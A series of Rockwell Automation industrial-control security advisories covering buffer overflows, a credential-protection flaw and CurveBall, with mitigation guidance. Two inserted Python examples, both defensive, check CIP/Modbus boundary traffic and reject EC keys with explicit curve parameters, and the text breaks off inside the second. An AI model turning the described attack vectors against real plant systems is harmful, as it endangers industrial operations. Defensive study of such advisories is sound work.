Rockwell Automation received a report from Jared Rittle of Cisco Talos regarding three vulnerabilities in the 1794-AENT Flex I/O Series B adapter. If successfully exploited, these vulnerabilities may lead to denial-of-service conditions.

Customers using affected versions of this firmware are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

1794-AENT Flex I/O, Series B, versions 4.003 (and earlier).

Vulnerability Details

CVE-2020-6083: Denial of Service due to Ethernet/IP Request Path Port Segment Buffer Overflow
A buffer overflow vulnerability exists in the Ethernet/IP Request Path Port Segment. This vulnerability could allow a remote, unauthenticated attacker to send a malicious packet resulting in a denial-of-service condition on the device.

CVSS v3.1 Base Score: 7.5/10 [HIGH]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2020-6084, CVE-2020-6085: Denial of Service due to Ethernet/IP Request Path Logical Segment Buffer Overflow
A buffer overflow vulnerability exists in the Ethernet/IP Request Path Logical Segment. This vulnerability could allow a remote unauthenticated attacker to send a malicious packet resulting in the device entering a fault state causing a denial-of-service condition.

CVSS v3.1 Base Score: 7.5/10 [HIGH]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2020-6086, CVE-2020-6087: Denial of Service due to Ethernet/IP Request Path Data Segment Buffer Overflow
A buffer overflow vulnerability exists in the Ethernet/IP Request Path Data Segment. This vulnerability could allow a remote unauthenticated attacker to send a malicious packet resulting in the device entering a fault state causing a denial-of-service condition.

CVSS v3.1 Base Score: 7.5/10 [HIGH]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Version 1.1 Update:
CVE-2020-6088: Denial of Service due to Ethernet/IP Request Path Network Segment Buffer Overflow
A buffer overflow vulnerability exists in the Ethernet/IP Request Path Network Segment. This vulnerability could allow a remote, unauthenticated attacker to send a malicious packet resulting in a denial-of-service condition on the device.

CVSS v3.1 Base Score: 7.5/10 [HIGH]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Risk Mitigation & User Action

Customers using the affected firmware versions are directed towards risk mitigation. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy. Please subscribe to updates to this advisory and the Industrial Security Advisory Index to stay notified.

Vulnerabilities | Affected Products | Suggested Mitigations
CVE-2020-6083, CVE-2020-6084, CVE-2020-6085, CVE-2020-6086, CVE-2020-6087, CVE-2020-6088 | 1794-AENT Flex I/O, Series B, firmware versions 4.003 and earlier | Version 2.0: Apply firmware v4.004 (download). Version 1.0: It is recommended for customers to use this module in the Cell/Area Zone (Level 1) as defined on page 16 of the System Security Design Guidelines and only accept CIP connections from trusted sources via port 44818.

For successful exploitation, these vulnerabilities require Ethernet/IP packets to reach the destination device. To reduce risk, customers should ensure they are employing proper network segmentation and security controls. Specifically, network exposure for all control system devices should be minimized and control systems should be behind firewalls and isolated from other networks when possible. Refer to the Converged Plantwide Ethernet (CPwE) Design and Implementation Guide for best practices deploying network segmentation and broader defense-in-depth strategies.

Customers should consider using proper network infrastructure controls, such as firewalls, UTM devices, VPN, or other security appliances.

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Utilize proper network infrastructure controls, such as firewalls, to help ensure that traffic from unauthorized sources is blocked.

Social Engineering Mitigation Strategies
  • Do not click on or open URL links from untrusted sources.
  • Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.

General Mitigations
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID PN715.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).
Please direct all media inquiries to Kolve Byrd (kabyrd@rockwellautomation.com).

High
PN1545 | PN1545 | Modbus Vulnerability may lead to Denial-of-Service conditions in the MicroLogix 1400 Controller
Published Date:
January 28, 2021
Last Updated:
January 28, 2021
CVE IDs:
CVE-2021-22659
Products:
1766 MicroLogix 1400
CVSS Scores:
8.1
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Version 1.0 – January 28, 2021. Initial release.

Executive Summary

Rockwell Automation received a report from Parul Sindhwad and Dr. Faruk Kazi from COE-CNDS, Veermata Jijabai Technological Institute (VJTI), India regarding a vulnerability in the MicroLogix™ 1400 controller. If successfully exploited, this vulnerability may result in denial-of-service conditions.

This vulnerability does not impact MicroLogix 1400 controller users who have Modbus TCP disabled.

Customers using affected versions of this controller are encouraged to evaluate the following mitigations and apply them appropriately to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

MicroLogix 1400, all series version 21.6 and below.

Vulnerability Details

CVE-2021-22659: Buffer Overflow may lead to Denial-of-Service Conditions
A remote, unauthenticated attacker may be able to send a specially crafted Modbus packet which would allow the attacker to retrieve or modify random values in the register. If successfully exploited, this may lead to a buffer overflow resulting in a denial-of-service condition. The FAULT LED will flash RED and communications may be lost. Recovery from the denial-of-service condition requires the fault to be cleared by the user.

CVSS v3.1 Base Score: 8.1/10[HIGH]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:H

Risk Mitigation & User Action

Customers using the affected controller are directed towards risk mitigation. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy.

All users, if applicable, may disable Modbus TCP support if it is not necessary for their MicroLogix 1400 implementation. Without Modbus TCP enabled, a potential attacker does not have access to exploit the device using this vulnerability.

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Utilize proper network infrastructure controls (such as firewalls) to help ensure that Modbus TCP traffic from unauthorized sources is blocked.
  • Block all traffic to EtherNet/IP™ or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see Knowledgebase Article BF7490.
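One way to verify that the port restriction above is actually holding at the Manufacturing Zone boundary is to run the zone model over exported firewall or flow records. The following is an added example, not code from the advisory or from Rockwell Automation; it assumes a constructed CSV flow-record format and constructed zone subnets, and it includes Modbus TCP's well-known port 502 as an assumption, since the advisory names only 2222 and 44818.

```python
"""Flag CIP/EtherNet/IP and Modbus TCP flows that enter the Manufacturing Zone
from outside it (added example, not Rockwell code).

Assumptions (constructed for this example): flow records are CSV lines of
'timestamp,src_ip,dst_ip,proto,dst_port,action' as a firewall or NetFlow
collector might export them, and the Manufacturing Zone is the set of
subnets in MANUFACTURING_ZONE. Replace both with the site's own data.
"""
import ipaddress

# Ports named in the advisory for CIP / EtherNet/IP (2222, 44818). Modbus TCP's
# well-known port 502 is an assumption added here; the advisory does not state it.
WATCHED_PORTS = {
    2222: "CIP I/O",
    44818: "EtherNet/IP explicit messaging",
    502: "Modbus TCP",
}

# Constructed zone definition (example subnets, not a real site).
MANUFACTURING_ZONE = [ipaddress.ip_network(n)
                      for n in ("10.20.0.0/16", "192.168.50.0/24")]


def in_zone(ip: str, zone=MANUFACTURING_ZONE) -> bool:
    """True if the address falls inside any Manufacturing Zone subnet."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in zone)


def parse_flow(line: str) -> dict:
    """Parse one constructed CSV flow record into a dict."""
    ts, src, dst, proto, dport, action = [f.strip() for f in line.split(",")]
    return {"ts": ts, "src": src, "dst": dst, "proto": proto.upper(),
            "dport": int(dport), "action": action.upper()}


def find_boundary_violations(lines, zone=MANUFACTURING_ZONE):
    """Return flows on watched industrial ports whose destination is inside the
    zone but whose source is not. Flows the firewall already dropped are kept,
    with their action, so an analyst can tell a blocked probe from a real gap."""
    findings = []
    for raw in lines:
        raw = raw.strip()
        if not raw or raw.startswith("#"):
            continue
        flow = parse_flow(raw)
        service = WATCHED_PORTS.get(flow["dport"])
        if service is None:
            continue
        if in_zone(flow["dst"], zone) and not in_zone(flow["src"], zone):
            findings.append({**flow, "service": service})
    return findings


def summarize(findings):
    """Count findings and list the outside sources the boundary actually let in."""
    allowed = [f for f in findings if f["action"] == "ALLOW"]
    return {"total": len(findings), "allowed": len(allowed),
            "sources": sorted({f["src"] for f in allowed})}


# Constructed sample flow records (not real traffic).
SAMPLE_FLOWS = """
# ts,src,dst,proto,dport,action
2021-02-02T10:00:01Z,10.20.1.15,10.20.1.40,TCP,44818,ALLOW
2021-02-02T10:00:05Z,172.16.9.8,10.20.1.40,TCP,44818,ALLOW
2021-02-02T10:00:07Z,172.16.9.8,10.20.1.41,UDP,2222,DENY
2021-02-02T10:00:09Z,203.0.113.77,192.168.50.12,TCP,502,ALLOW
2021-02-02T10:00:12Z,172.16.9.8,10.20.1.40,TCP,443,ALLOW
2021-02-02T10:00:15Z,10.20.1.15,172.16.9.8,TCP,502,ALLOW
""".strip().splitlines()

if __name__ == "__main__":
    hits = find_boundary_violations(SAMPLE_FLOWS)
    for f in hits:
        print(f"{f['ts']} {f['action']:5s} {f['src']} -> "
              f"{f['dst']}:{f['dport']} ({f['service']})")
    print(summarize(hits))
```

Only the two ALLOW findings indicate a boundary rule that needs fixing; the DENY finding shows the firewall doing its job and is worth keeping as evidence of a probe from the business network.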

Software/PC-based Mitigation Strategies
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use of Microsoft® AppLocker or other similar allow list application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article QA17329.
  • Ensure that the least-privilege user principle is followed and user/service account access to shared resources (such as a database) is only granted with a minimum amount of rights as needed.

General Mitigations
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please see our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation at PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).


ADDITIONAL LINKS
  • PN1354 - Industrial Security Advisory Index.
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • ICSA-21-033-01

Medium
PN794 | PN794 | RSLogix 5000 Studio 5000 Logix Designer Source Protection Vulnerability
Published Date:
January 25, 2021
Last Updated:
January 25, 2021
CVE IDs:
CVE-2014-0755
Products:
Logix Designer
CVSS Scores:
6.3
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Version 2.0 – January 25, 2021 – Advisory updated for clarification.
Version 1.0 – February 04, 2014 – Initial Release. Originally Titled “RSLogix™ 5000 Password Vulnerability”.

Executive Summary

It has come to Rockwell Automation’s attention that a vulnerability exists in RSLogix 5000® and Studio 5000 Logix Designer® that, when exploited, provides access to content that was secured using Source Key Protection, and in some instances, may expose the password used for that protection.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.


Affected Products

Project content applying access control with Source Key Protection using an sk.dat file in RSLogix 5000 and/or Studio 5000 product software v7 and above.

Note: This does not apply to project content protected with License Source Protection. To determine what solution is in use, refer to Logix 5000 Controllers Security, 1756-PM016O-EN-P.

Vulnerability Details

CVE-2014-0755: Insufficiently Protected Credentials
A vulnerability exists in RSLogix 5000 and Studio 5000 Logix Designer that, when exploited, may allow a local, unauthenticated attacker to access and modify project files that are password protected using Source Key Protection and, in some instances, may expose those passwords. Project files include files with the ACD, L5X, or L5K extensions. Successful exploitation will not directly disrupt the operation of Rockwell Automation programmable controllers or other devices in the control system.

CVSS v2 Base Score: 6.3
CVSS v2 Vector: AV:L/AC:M/AU:N/C:C/I:C/A:N

Risk Mitigation & User Action

Customers using the affected software versions are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed toward the risk mitigation strategies provided below and are encouraged, when possible, to combine these tactics with the general security guidelines to employ multiple strategies simultaneously.
Vulnerability Details: CVE-2014-0755
Recommended User Actions:
Risk Mitigation Strategy A:
For stronger protection, apply License Source Protection introduced in v26.

To apply License Source Protection to content that is protected with Source Key Protection, the Source Key Protection must be removed prior to applying License Source Protection. Once content is protected with License Source Key, it must be downloaded to the appropriate controller to mitigate the risk associated with this vulnerability. Refer to Logix 5000 Controllers Security, 1756-PM016O-EN-P (rockwellautomation.com) for more information about Source Protection.

Risk Mitigation Strategy B:
In addition to using current software, we also recommend the following actions to concerned customers who continue to use Source Key Protection. Where possible:
  • Adopt a practice to track creation and distribution of protected ACD files, including duplicates and derivatives that contain protected content, in case these files need to be found or disposed of in the future.
  • Securely archive project files that contain content password protected with Source Key Protection in a manner that prevents unauthorized access. For instance, store project files that use Source Key Protection in physical and logical locations where access can be controlled, and the files are stored in a protected and potentially encrypted manner.
  • Securely transmit project files that contain content password protected with Source Key Protection in a manner that prevents unauthorized access. For instance, email stored project files that use Source Key Protection only to known recipients and encrypt the files such that only the target recipient can decrypt the content.
  • Restrict the physical network access to controllers containing password protected content only to authorized parties to help prevent unauthorized uploading of protected material in an ACD file. Note: For some customers, FactoryTalk Security software may be a suitable option to assist customers with applying a role-based access control solution to their system. FactoryTalk Security was integrated into RSLogix 5000 v10.00 and above.
  • Adopt a password management practice to periodically change passwords applied to routines and Add-On Instructions to help mitigate the risk that a learned password may remain useable for an extended period or indefinitely.


IMPORTANT: Files with Source Key Protection password protected content that have been opened and updated using v20.03 software and above will no longer be compatible with earlier versions of the software. For example, a v20.01 project file with password protected content that has been opened and re-saved using v20.03 software can only be opened with v20.03 software and higher. Also, a v21.00 project file with protected content that has been opened and re-saved using v21.03 software can only be opened with v21.03 and higher versions of software.

For the procedure to update older project files to v20.03 (or later), refer to the FAQ for V20.03 at KnowledgeBase ID: IN64.

General Security Guidelines

Software/PC-based Mitigation Strategies
The following Software/PC Mitigations may be appropriate to include when the vulnerability is within a software product running on a PC:
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use of Microsoft AppLocker or other similar allow list applications can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article ID QA17329.
  • Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum amount of rights as needed.
General Mitigations
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID PN715.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).



ADDITIONAL LINKS
  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • ICS Advisory (ICSA-14-021-01)

High
PN1540 | PN1540 | FactoryTalk Linx and FactoryTalk Services Platform Contain Denial-of-Service Vulnerabilities
Published Date:
January 22, 2021
Last Updated:
January 22, 2021
CVE IDs:
CVE-2020-5806, CVE-2020-5801, CVE-2020-5802, CVE-2020-5807
Products:
FactoryTalk Linx Gateway, FactoryTalk Services Platform, FactoryTalk Linx / RSLinx Enterprise
CVSS Scores:
7.5, 6.2, 4.3
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number: 2.0
Version 3.0 - January 22, 2021. Updated and Corrected Risk Mitigation & User Actions.
Version 2.0 - January 14, 2021. Updated Risk Mitigation & User Actions.
Version 1.0 - December 27, 2020. Initial Version.

Executive Summary

Rockwell Automation received a report from Tenable regarding four vulnerabilities. Three of these vulnerabilities are within FactoryTalk® Linx software and the fourth is in FactoryTalk Services Platform. If successfully exploited, these vulnerabilities may result in denial-of-service conditions.

Nearly all FactoryTalk software ships with a FactoryTalk Services Platform. If you are unsure if you have the FactoryTalk Services Platform installed, please see Knowledgebase ID QA5266 for additional details.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

Vulnerability Affected Products
CVE-2020-5801 FactoryTalk Linx version 6.20 and earlier.
CVE-2020-5802 FactoryTalk Linx version 6.20 and earlier.
CVE-2020-5806 FactoryTalk Linx versions 6.10, 6.11, and 6.20.
CVE-2020-5807 FactoryTalk Services Platform version 6.20 and earlier.

Vulnerability Details

CVE-2020-5801 and CVE-2020-5802: Denial-of-Service due to Unhandled Exception
An unhandled exception vulnerability exists within a .dll in FactoryTalk Linx. This vulnerability could allow a remote, unauthenticated attacker to send a malicious packet resulting in the termination of RSLinxNG.exe causing a denial of service condition.

CVSS v3.1 Base Score: 7.5 [HIGH]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2020-5806: Denial-of-Service due to Buffer Overflow
A buffer overflow vulnerability exists within a .dll in FactoryTalk Linx. This vulnerability could allow a local, unauthenticated attacker to send a malicious packet resulting in the termination of RSLinxNG.exe causing a denial-of-service condition.

CVSS v3.1 Base Score: 6.2 [MEDIUM]
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2020-5807: Denial-of-Service due to Buffer Overflow
A buffer overflow vulnerability exists within a .dll in FactoryTalk Services Platform. This vulnerability could be exploited via a phishing attack in which an attacker sends a specially crafted log file to a local user. When the malicious log file is opened by a local user, it can cause a buffer overflow in the FactoryTalk Services Platform resulting in temporary denial-of-service conditions. Users can recover from the condition by reopening the impacted software.

CVSS v3.1 Base Score: 4.3 [MEDIUM]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

Risk Mitigation & User Action

Customers using the affected software are directed towards risk mitigation. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy. Please subscribe to updates to this advisory and the Industrial Security Advisory Index to stay notified.

Version 3.0: Correction
Vulnerability Suggested Actions
CVE-2020-5801, CVE-2020-5802 Version 2.0: Apply patch found in BF26285. Version 1.0: Apply Internet Protocol Security (IPSec) to provide security services for IP network traffic. For more information on how to apply IPSec, see Knowledge Base ID QA46277.
CVE-2020-5806 Version 3.0: Apply patch found in BF26287.
CVE-2020-5807 For FactoryTalk Services Platform v6.20, see Patch Answer ID BF26157.

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Utilize proper network infrastructure controls, such as firewalls, to help ensure that traffic from unauthorized sources is blocked.
  • Consult the product documentation for specific features, such as a hardware keyswitch setting, which may be used to block unauthorized changes.
  • Block all traffic to EtherNet/IP™ or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation® products, see Knowledgebase Article ID BF7490.
Software/PC-based Mitigation Strategies
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use Microsoft® AppLocker or other similar allow list applications that can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article ID QA17329.
  • Confirm that the least-privilege user principle is followed and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.
Social Engineering Mitigation Strategies
  • Do not open untrusted .ftd files with FactoryTalk Services Platform.
  • Do not click on or open URL links from untrusted sources.
  • Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.
General Mitigations
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID PN715.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.
For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS
  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide

High
PN1113 | PN1113 | CVE-2020-0601 Impact to Rockwell Automation Products
Published Date:
January 20, 2021
Last Updated:
January 20, 2021
CVE IDs:
CVE-2020-0601
Products:
FactoryTalk Analytics for Devices, FactoryTalk Analytics LogixAI, 1756 ControlLogix I/O
CVSS Scores:
8.1
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number: 2.0
Version 2.0 - January 20, 2021 - Updated Risk Mitigations and Recommended User Actions.
Version 1.1 - January 31, 2020
Version 1.0 - January 17, 2020

Executive Summary

On Tuesday, January 14, 2020, Microsoft issued a patch and advisory addressing a major crypto vulnerability affecting Windows 10, Windows 10 IoT Core and Enterprise, and Windows Server 2016 and 2019. This vulnerability, identified as CVE-2020-0601, is also being referred to as "CurveBall," and exists in the way Crypt32.dll validates Elliptic Curve Cryptography (ECC) certificates. This vulnerability breaks the chain of trust and could allow an attacker to sign a malicious executable, allow interception and modification of TLS-encrypted traffic, or spoof Authenticode code signing certificates. The National Security Agency (NSA) coordinated the information and release of this vulnerability with Microsoft.

The Rockwell Automation® Product Security Incident Response Team (PSIRT) has been tracking this vulnerability since its release. At the time of writing, Rockwell Automation products are not being directly targeted, but are impacted by vulnerable Windows 10 IoT installations. Please see the Affected Products for a full list of potentially affected Rockwell Automation products.

An investigation is ongoing. Currently, Rockwell Automation is working to address these vulnerabilities and will continue to provide updates as information becomes available.

Affected Products

Microsoft Windows 10 IoT Core and Enterprise editions are impacted by this vulnerability. At the time of publishing, the following Rockwell Automation products are impacted by CVE-2020-0601:

  • CompactLogix 5480 Controllers
  • FactoryTalk Analytics for Devices
  • FactoryTalk Analytics LogixAI
  • ControlLogix Compute Module (1756-CMS1B1)

Vulnerability Details

CVE-2020-0601: Windows CryptoAPI Spoofing Vulnerability

Description: A vulnerability exists in the way Windows CryptoAPI validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source.

  • Microsoft Assigned CVSSv3.0 Base Score: 8.1
  • Microsoft Assigned CVSSv3.0 Vector String: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
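The spoofing described above relies on certificates whose EC public key carries explicit curve parameters instead of a named-curve OID, which the unpatched CryptoAPI accepted without checking that those parameters matched the trusted root's curve (that mechanism is from Microsoft's and CERT/CC's write-ups, not from the advisory text). The classifier below is an added example, not Rockwell Automation or Microsoft code: it inspects a DER SubjectPublicKeyInfo, accepts only named curves on an allow list, and rejects explicit or implicit parameters outright; the sample keys are constructed here with placeholder public-key bytes.

```python
"""Classify the EC parameters in a DER SubjectPublicKeyInfo (SPKI).

Added example for the CVE-2020-0601 entry; not vendor code. A defender can run
the same check over keys pulled from code-signing or TLS certificates during
an inventory: named curves on the allow list pass, anything else is rejected.
"""
from typing import Tuple

SEQUENCE, OID, BIT_STRING, NULL, INTEGER = 0x30, 0x06, 0x03, 0x05, 0x02
ID_EC_PUBLIC_KEY = bytes.fromhex("2a8648ce3d0201")            # 1.2.840.10045.2.1
NAMED_CURVES = {
    bytes.fromhex("2a8648ce3d030107"): "prime256v1 (P-256)",  # 1.2.840.10045.3.1.7
    bytes.fromhex("2b81040022"): "secp384r1 (P-384)",         # 1.3.132.0.34
    bytes.fromhex("2b81040023"): "secp521r1 (P-521)",         # 1.3.132.0.35
}


def der(tag: int, body: bytes) -> bytes:
    """Encode one DER TLV, using the long length form when needed."""
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    length_bytes = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(length_bytes)]) + length_bytes + body


def read_tlv(buf: bytes, off: int) -> Tuple[int, bytes, int]:
    """Decode the TLV at buf[off:]; return (tag, value, offset just after it)."""
    if off + 2 > len(buf):
        raise ValueError("truncated TLV header")
    tag, first = buf[off], buf[off + 1]
    off += 2
    if first < 0x80:
        length = first
    else:
        nbytes = first & 0x7F
        if nbytes == 0 or nbytes > 4 or off + nbytes > len(buf):
            raise ValueError("bad DER length")
        length = int.from_bytes(buf[off:off + nbytes], "big")
        off += nbytes
    end = off + length
    if end > len(buf):
        raise ValueError("TLV value runs past end of buffer")
    return tag, buf[off:end], end


def classify_ec_spki(spki: bytes) -> Tuple[str, str]:
    """Return ("accept" | "reject" | "not-ec", detail) for a DER SPKI."""
    tag, body, end = read_tlv(spki, 0)
    if tag != SEQUENCE or end != len(spki):
        raise ValueError("SubjectPublicKeyInfo must be a single SEQUENCE")
    alg_tag, alg, off = read_tlv(body, 0)           # AlgorithmIdentifier
    key_tag, _key, _ = read_tlv(body, off)          # subjectPublicKey BIT STRING
    if alg_tag != SEQUENCE or key_tag != BIT_STRING:
        raise ValueError("malformed SubjectPublicKeyInfo")
    oid_tag, oid, params_off = read_tlv(alg, 0)
    if oid_tag != OID:
        raise ValueError("AlgorithmIdentifier lacks an algorithm OID")
    if oid != ID_EC_PUBLIC_KEY:
        return "not-ec", "algorithm is not id-ecPublicKey"
    if params_off >= len(alg):
        return "reject", "ECParameters absent"
    p_tag, params, _ = read_tlv(alg, params_off)
    if p_tag == OID:                                # namedCurve
        name = NAMED_CURVES.get(params)
        return ("accept", name) if name else ("reject", "named curve not on allow list")
    if p_tag == SEQUENCE:                           # specifiedCurve: the CurveBall shape
        return "reject", "explicit ECParameters (CVE-2020-0601 pattern)"
    if p_tag == NULL:                               # implicitlyCA
        return "reject", "implicitlyCA parameters"
    return "reject", f"unexpected ECParameters tag 0x{p_tag:02x}"


def build_ec_spki(params: bytes, point: bytes) -> bytes:
    """Assemble an id-ecPublicKey SubjectPublicKeyInfo with the given parameters."""
    alg = der(SEQUENCE, der(OID, ID_EC_PUBLIC_KEY) + params)
    return der(SEQUENCE, alg + der(BIT_STRING, b"\x00" + point))


# Constructed placeholder public key: uncompressed-point prefix plus 64 zero bytes
# (not a real curve point; the classifier never evaluates it).
PLACEHOLDER_POINT = b"\x04" + bytes(64)
NAMED_CURVE_SPKI = build_ec_spki(der(OID, bytes.fromhex("2a8648ce3d030107")), PLACEHOLDER_POINT)
# Explicit parameters are a SEQUENCE where the curve OID should be. Only the
# version INTEGER is filled in; a real specifiedCurve block also carries the
# field, curve coefficients, base point and order, none of which the classifier
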